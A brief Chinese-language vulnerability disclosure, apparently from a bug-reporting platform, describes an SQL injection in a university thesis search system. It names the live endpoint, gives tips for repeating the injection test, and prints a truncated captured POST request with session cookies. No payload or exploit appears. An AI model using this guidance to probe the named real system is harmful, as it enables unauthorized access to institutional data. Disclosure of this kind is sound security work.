某学位论文SQL漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 某学位论文SQL漏洞 ### 详细说明: 某学位论文SQL漏洞 ### 漏洞证明: 这次拿到清华大学的论文提交系统做 案例一: http://thesis.lib.tsinghua.edu.cn:8001/paper/search.jsp 出问题的在这里的账号,我在抓post发现这个抓去注入只能测试一次,也就是说你第一次post查出来是注入,再去post就会失败,需要从新抓取post数据。 ps:抓包千万别让他跳转到下一个页面,他这个参数抓一次就变一个 post数据: POST /papercon HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Referer: http://thesis.lib.tsinghua.edu.cn:8001/paper/search.jsp Accept-Language: zh-CN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: thesis.lib.tsinghua.edu.cn:8001 Content-Length: 133 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: SESSfd0269bf02d778bea282bf1ea4b41113=55g1n7ol2nu94ibks886f9qb54; JSESSIONID=A1CD0701F60805B606DEA20AD24F2AE4...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息